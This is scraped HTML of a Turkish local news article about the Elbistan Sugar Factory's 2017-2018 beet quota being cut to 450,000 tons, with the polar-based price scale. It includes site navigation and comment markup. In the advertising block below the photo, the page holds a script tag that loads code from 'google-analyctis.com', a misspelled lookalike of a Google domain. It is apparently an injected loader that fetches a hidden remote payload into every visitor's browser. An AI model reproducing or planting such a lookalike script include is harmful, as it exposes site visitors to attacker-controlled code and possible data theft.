src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/02/1_3.jpg" alt="Pancar tarımının sorunları ve çözüm önerileri anlatıldı" class="pull-left" /> <div class="caption-line"><p>Pancar tarımının sorunları ve çözüm...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/buyuksehir-belediyesi-sokak-kopeklerini-topluyor-h37914.html" title="Büyükşehir Belediyesi sokak köpeklerini topluyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/02/2_3.jpg" alt="Büyükşehir Belediyesi sokak köpeklerini topluyor" class="pull-left" /> <div class="caption-line"><p>Büyükşehir Belediyesi sokak köpeklerini topluyor</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Elbistan’ın kotası 500 binden 450 bin tona düştü</h1> <h2 class="lead" itemprop="description"><strong>Elbistan Şeker Fabrikası’nın 2017-2018 dönemi pancar kotası, geçtiğimiz yıla göre 50 bin ton düşürülerek 450 bin ton oldu.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2017-02-22 15:26:43" content="2017-02-22T15:26:43+02:00">22 Şubat 2017 Çarşamba 15:26</span></p> <p class="pull-right">Bu haber <b class="hitCounter"></b> kez okundu.</p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG" alt="Elbistan’ın kotası 500 binden 450 bin tona düştü" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/elbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div> <div class="reklam reklam134 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" width="200" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" /></object></div> <div class="reklam reklam135 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/ceren4.swf" width="600" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/ceren4.swf" /></object></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:14.2pt"><span style="font-family: Arial, sans-serif; font-size: 13.3333px; text-indent: 18.9333px;">Elbistan Şeker Fabrikası’nın 2017-2018 dönemi pancar kotası, geçtiğimiz yıla göre 50 bin ton düşürülerek 450 bin ton oldu.</span></p> <p class="MsoNormal" style="text-indent:14.2pt"><span style="font-size: 10pt; font-family: Arial, sans-serif;">33. kampanya dönemi için Elbistan’a 200 bin tondan fazla kota ayrılırken, geriye kalan kısım da Afşin, Göksun ve Tufanbeyli’deki çiftçiler tarafından kullanılacak. Elbistan’daki binlerce çiftçinin en büyük gelir kaynağından biri olan şekerpancarının ekim çalışmaları önümüzdeki aylarda başlayacak. Bu yıl üretilecek pancarın taban fiyatı ton başına 210 lira olacak. &#160;<o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:14.2pt"><span style="font-size: 10pt; font-family: Arial, sans-serif;">Elbistan Şeker Fabrikası’nın geçtiğimiz yıl için 500 bin olarak belirlenen pancar kotası, 2017-2018 kampanya dönemi için 450 bin ton olarak açıklandı. Elbistan başta olmak üzere, Göksun, Afşin ve Tufanbeyli’deki ekim sahalarından da pancar alımı yapan Elbistan Şeker Fabrikası’nın bu kotası için 75 bin dönüme yakın alanda ekim yapılacak. Elbistan’daki ekim sahası ise 30 bin dönümün üzerine çıkacak. Polar düşüklüğü nedeniyle son 3 yıldır pancardan yana sıkıntı yaşayan Elbistan çiftçisi, kota rakamlarının açıklanmasıyla birlikte Elbistan Ziraat Bölge Şefliği’nde işlemlerini yaptıracak. Çiftçiler, taahhüt sözleşmesi imzalayacak. &#160;<o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:14.2pt"><span style="font-size: 10pt; font-family: Arial, sans-serif;">Elbistan’da üretilen pancarın şeker oranındaki düşüşle ilgili tartışma ve yargı süreci devam ederken Başbakan Binali Yıldırım tarafından açıklanan taban fiyat ise, ton başına 210 lira olarak uygulanacak. Ancak bu rakam, 16 polar için geçerli olacak. Çiftçiler ise, geriye dönük olarak bakıldığında sürekli bir düşüşün yaşandığı Elbistan’da 16 polar oranının yakalanamaması endişesini taşıyor. Sadece geçtiğimiz yıl 10 milyon TL kayıp yaşadıklarını belirten çiftçiler, sorunun kaynağı olarak laboratuarı görürken, konu yargıya taşındı. Elbistan Ziraat Odası da polar düşüklüğünün sebeplerinin tarımsal olarak sebeplerine ilişkin uzmanlarla çiftçileri buluşturdu. <o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:14.2pt"><span style="font-size: 10pt; font-family: Arial, sans-serif;">Üreticilerin merakla beklediği şekerpancarı taban fiyatı Başbakan Binali Yıldırım tarafından açıklanmıştı. Başbakan Yıldırım, partisinin grup toplantısında yaptığı açıklamada geçtiğimiz yıl 190 lira olan pancar fiyatının yüzde 10.5 artışla 210 liraya çıkarıldığını belirtmişti. Söz konusu rakam için yüzde 16 polar değeri baz alınacak. Polardaki 1 puanlık düşüş için bu rakamdan ton başına 13 lira düşüş yapılacak. Üretici, şeker fabrikasına teslim ettiği 16 polarlı pancar için 210 lira para alacak. Polar oranı 21’e çıktığı zaman da ton başına 275,62 TL alacak. Polar oranı 15’e düştüğünde ise çiftçinin alacağı para da 13 lira düşüyor. 15 polar için çiftçiye 196,87 TL ödeme yapılacak. Çiftçiler, en düşük rakamı ise 13 polar için alıyor. 13 polarlı olarak fabrikaya teslim edilen şekerpancarı için çiftçiye ton başına 170,62 TL ödeniyor.<o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:14.2pt"><span style="font-size: 10pt; font-family: Arial, sans-serif;">Elbistan’da yetiştirilen pancarın geçtiğimiz yıla ait polar ortalaması ise 14-15 arasında değişiyor. Aynı durumun bu yıl da devam etmesi halinde Elbistan çiftçisi milyonlarca lira ekonomik kayba uğrayacak. Bu kayıp sadece çiftçiyi değil, Elbistan ekonomisini de büyük oranda etkiliyor. Doğrudan 50 milyon lira gibi bir girdisi bulunan şekerpancarı tarımının diğer sektörlerle birlikte ilçe ekonomisine 100 milyon liraya yakın katkı sağladığı biliniyor.<o:p><br /> <img src="/images/upload/pancar (2).JPG" width="640" height="386" alt="" /><br type="_moz" /> </o:p></span></p> <p class="MsoNormal" style="text-indent:14.2pt"></p></div> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twenty carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/santraller-ceyhanin-temizligine-de-engel-h37932.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/fransiz-elyne-muslumanligi-secti-ismi-elif-oldu-h37931.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/goksunda-girisimciler-sertifikalarini-aldilar-h37940.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/buyuksehirden-aile-danismanlik-hizmeti-h37939.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastane-icin-basvurular-genclik-merkezinde-alinacak-h37938.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/egitim-kultur/ogrenci-tasima-guvenligi-toplantisi-yapildi-h37937.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yeni-kimligini-alamayanlar-gecici-kimlikle-ygsye-girecek-h37936.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/akin-irademizin-kalici-olmasi-ve-istikrar-icin-evet-diyecegiz-h37934.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/darende-kaymakami-gaziantep-te-tutuklandi-h37930.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/saglik/yeni-hastane-gun-sayiyor-h37926.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elektrik-akimina-kapilan-15-inek-telef-oldu-h37928.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/egitim-kultur/ozel-yildizda-yasama-yol-ver-semineri-h37927.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/politika/oztunctan-sp-ilce-baskani-polata-hayirli-olsun-ziyareti-h37925.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/ekonomi/kosgeb-faizsiz-kredi-sonuclari-27-subatta-aciklanacak-h37924.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-akkoyun-muhtarlarla-bir-araya-geldi-h37923.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/saglik/hastaneye-alim-is-kur-uzerinden-yapilacak-h37922.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/14-subat-gunu-oldurulen-kadinin-katili-yakalandi-h37920.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/trafik-kazasi-ucuz-atlatildi-h37918.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/3-aylik-suriyeli-bebegin-olumu-supheli-goruldu-h37917.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li class="tumu"><a href="http://www.elbistaninsesi.com/tum-mansetler.html"><span class="halflings-icon th-large"></span></a></li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/santraller-ceyhanin-temizligine-de-engel-h37932.html" title="Santraller, Ceyhan’ın temizliğine de engel"> <span class="label label-info"><i class="halflings-icon white film"></i> Video Haber</span> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/santraller_ceyhanin_temizligine_de_engel_h37932_ab1d1.JPG" alt="Santraller, Ceyhan’ın temizliğine de engel" /> <div class="carousel-caption"> <h2> <span style="font-size:">Santraller, Ceyhan’ın temizliğine de engel</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/fransiz-elyne-muslumanligi-secti-ismi-elif-oldu-h37931.html" title="Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu"> <span class="label label-info"><i class="halflings-icon white film"></i> Video Haber</span> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/fransiz_elyne_muslumanligi_secti_ismi_elif_oldu_h37931_b73d7.JPG" alt="Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/goksunda-girisimciler-sertifikalarini-aldilar-h37940.html" title="Göksun’da girişimciler sertifikalarını aldılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/goksunda_girisimciler_sertifikalarini_aldilar_h37940_48d56.JPG" alt="Göksun’da girişimciler sertifikalarını aldılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Göksun’da girişimciler sertifikalarını aldılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/buyuksehirden-aile-danismanlik-hizmeti-h37939.html" title="Büyükşehir’den, Aile Danışmanlık Hizmeti"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/buyuksehirden_aile_danismanlik_hizmeti_h37939_bbb19.jpg" alt="Büyükşehir’den, Aile Danışmanlık Hizmeti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Büyükşehir’den, Aile Danışmanlık Hizmeti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hastane-icin-basvurular-genclik-merkezinde-alinacak-h37938.html" title="Hastane için başvurular Gençlik Merkezi’nde alınacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/hastane_icin_basvurular_genclik_merkezinde_alinacak_h37938_40f22.jpg" alt="Hastane için başvurular Gençlik Merkezi’nde alınacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastane için başvurular Gençlik Merkezi’nde alınacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/egitim-kultur/ogrenci-tasima-guvenligi-toplantisi-yapildi-h37937.html" title="Öğrenci Taşıma Güvenliği Toplantısı yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/ogrenci_tasima_guvenligi_toplantisi_yapildi_h37937_db15f.jpg" alt="Öğrenci Taşıma Güvenliği Toplantısı yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öğrenci Taşıma Güvenliği Toplantısı yapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/yeni-kimligini-alamayanlar-gecici-kimlikle-ygsye-girecek-h37936.html" title="Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/yeni_kimligini_alamayanlar_gecici_kimlikle_ygsye_girecek_h37936_e2463.jpg" alt="Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html" title="Elbistan’ın kotası 500 binden 450 bin tona düştü"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG" alt="Elbistan’ın kotası 500 binden 450 bin tona düştü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın kotası 500 binden 450 bin tona düştü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/akin-irademizin-kalici-olmasi-ve-istikrar-icin-evet-diyecegiz-h37934.html" title="Akın: İrademizin kalıcı olması ve istikrar için ‘evet’ diyeceğiz"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/akin_irademizin_kalici_olmasi_ve_istikrar_icin_evet_diyecegiz_h37934_29396.jpg" alt="Akın: İrademizin kalıcı olması ve istikrar için ‘evet’ diyeceğiz" /> <div class="carousel-caption"> <h2> <span style="font-size:">Akın: İrademizin kalıcı olması ve istikrar için ‘evet’ diyeceğiz</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/darende-kaymakami-gaziantep-te-tutuklandi-h37930.html" title="Darende Kaymakamı Gaziantep&#039;te tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/darende_kaymakami_gaziantep_te_tutuklandi_h37930_f7757.jpg" alt="Darende Kaymakamı Gaziantep&#039;te tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Darende Kaymakamı Gaziantep&#039;te tutuklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/saglik/yeni-hastane-gun-sayiyor-h37926.html" title="Yeni Hastane gün sayıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/yeni_hastane_gun_sayiyor_h37926_50a2b.jpg" alt="Yeni Hastane gün sayıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yeni Hastane gün sayıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elektrik-akimina-kapilan-15-inek-telef-oldu-h37928.html" title="Elektrik akımına kapılan 15 inek telef oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/elektrik_akimina_kapilan_15_inek_telef_oldu_h37928_4a8bb.jpg" alt="Elektrik akımına kapılan 15 inek telef oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elektrik akımına kapılan 15 inek telef oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/egitim-kultur/ozel-yildizda-yasama-yol-ver-semineri-h37927.html" title="Özel Yıldız’da ‘Yaşama Yol Ver’ Semineri"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/ozel_yildizda_yasama_yol_ver_semineri_h37927_6d338.jpg" alt="Özel Yıldız’da ‘Yaşama Yol Ver’ Semineri" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özel Yıldız’da ‘Yaşama Yol Ver’ Semineri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/politika/oztunctan-sp-ilce-baskani-polata-hayirli-olsun-ziyareti-h37925.html" title="Öztunç’tan SP ilçe Başkanı Polat’a hayırlı olsun ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/oztunctan_sp_ilce_baskani_polata_hayirli_olsun_ziyareti_h37925_3038a.jpg" alt="Öztunç’tan SP ilçe Başkanı Polat’a hayırlı olsun ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç’tan SP ilçe Başkanı Polat’a hayırlı olsun ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/ekonomi/kosgeb-faizsiz-kredi-sonuclari-27-subatta-aciklanacak-h37924.html" title="KOSGEB faizsiz kredi sonuçları 27 Şubat’ta açıklanacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/kosgeb_faizsiz_kredi_sonuclari_27_subatta_aciklanacak_h37924_db2f8.jpg" alt="KOSGEB faizsiz kredi sonuçları 27 Şubat’ta açıklanacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">KOSGEB faizsiz kredi sonuçları 27 Şubat’ta açıklanacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-akkoyun-muhtarlarla-bir-araya-geldi-h37923.html" title="Kaymakam Akkoyun, muhtarlarla bir araya geldi"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/kaymakam_akkoyun_muhtarlarla_bir_araya_geldi_h37923_d772f.JPG" alt="Kaymakam Akkoyun, muhtarlarla bir araya geldi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Akkoyun, muhtarlarla bir araya geldi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/saglik/hastaneye-alim-is-kur-uzerinden-yapilacak-h37922.html" title="Hastaneye alım İş-Kur üzerinden yapılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/hastaneye_alim_is_kur_uzerinden_yapilacak_h37922_9b585.JPG" alt="Hastaneye alım İş-Kur üzerinden yapılacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastaneye alım İş-Kur üzerinden yapılacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/14-subat-gunu-oldurulen-kadinin-katili-yakalandi-h37920.html" title="14 Şubat Günü Öldürülen Kadının Katili Yakalandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/14_subat_gunu_oldurulen_kadinin_katili_yakalandi.jpg" alt="14 Şubat Günü Öldürülen Kadının Katili Yakalandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">14 Şubat Günü Öldürülen Kadının Katili Yakalandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/trafik-kazasi-ucuz-atlatildi-h37918.html" title="Trafik kazası ucuz atlatıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/trafik_kazasi_ucuz_atlatildi_h37918_ebdd1.jpg" alt="Trafik kazası ucuz atlatıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Trafik kazası ucuz atlatıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/3-aylik-suriyeli-bebegin-olumu-supheli-goruldu-h37917.html" title="3 aylık Suriyeli bebeğin ölümü şüpheli görüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/02/3_aylik_suriyeli_bebegin_olumu_supheli_goruldu_h37917_de6d2.jpg" alt="3 aylık Suriyeli bebeğin ölümü şüpheli görüldü" /> <div class="carousel-caption"> <h2> <span style="font-size:">3 aylık Suriyeli bebeğin ölümü şüpheli görüldü</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">1</span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(37935);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="37935" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="ab4eff739db1253c7536fcaac8e74484821547d6" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> <div id="comment_list"> <div class="comment_box row-fluid" id="comment_173686"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>elbistanlı</b> <small class="time">1 saat önce</small> <p class="text">doğrumu olmamalı böyle</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@elbistanlı" id="173686"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like173686" onclick="like(173686,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike173686">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike173686" onclick="like(173686,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike173686">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> </div> <!-- #comment_list --> </div> <!-- .tab-pane --> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/goksunda-girisimciler-sertifikalarini-aldilar-h37940.html" title="Göksun’da girişimciler sertifikalarını aldılar"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/goksunda_girisimciler_sertifikalarini_aldilar_h37940_48d56.JPG" alt="Göksun’da girişimciler sertifikalarını aldılar" /> <span>Göksun’da girişimciler sertifikalarını aldılar</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/buyuksehirden-aile-danismanlik-hizmeti-h37939.html" title="Büyükşehir’den, Aile Danışmanlık Hizmeti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/buyuksehirden_aile_danismanlik_hizmeti_h37939_bbb19.jpg" alt="Büyükşehir’den, Aile Danışmanlık Hizmeti" /> <span>Büyükşehir’den, Aile Danışmanlık Hizmeti</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/hastane-icin-basvurular-genclik-merkezinde-alinacak-h37938.html" title="Hastane için başvurular Gençlik Merkezi’nde alınacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/hastane_icin_basvurular_genclik_merkezinde_alinacak_h37938_40f22.jpg" alt="Hastane için başvurular Gençlik Merkezi’nde alınacak" /> <span>Hastane için başvurular Gençlik Merkezi’nde alınacak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/yeni-kimligini-alamayanlar-gecici-kimlikle-ygsye-girecek-h37936.html" title="Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek"> <img 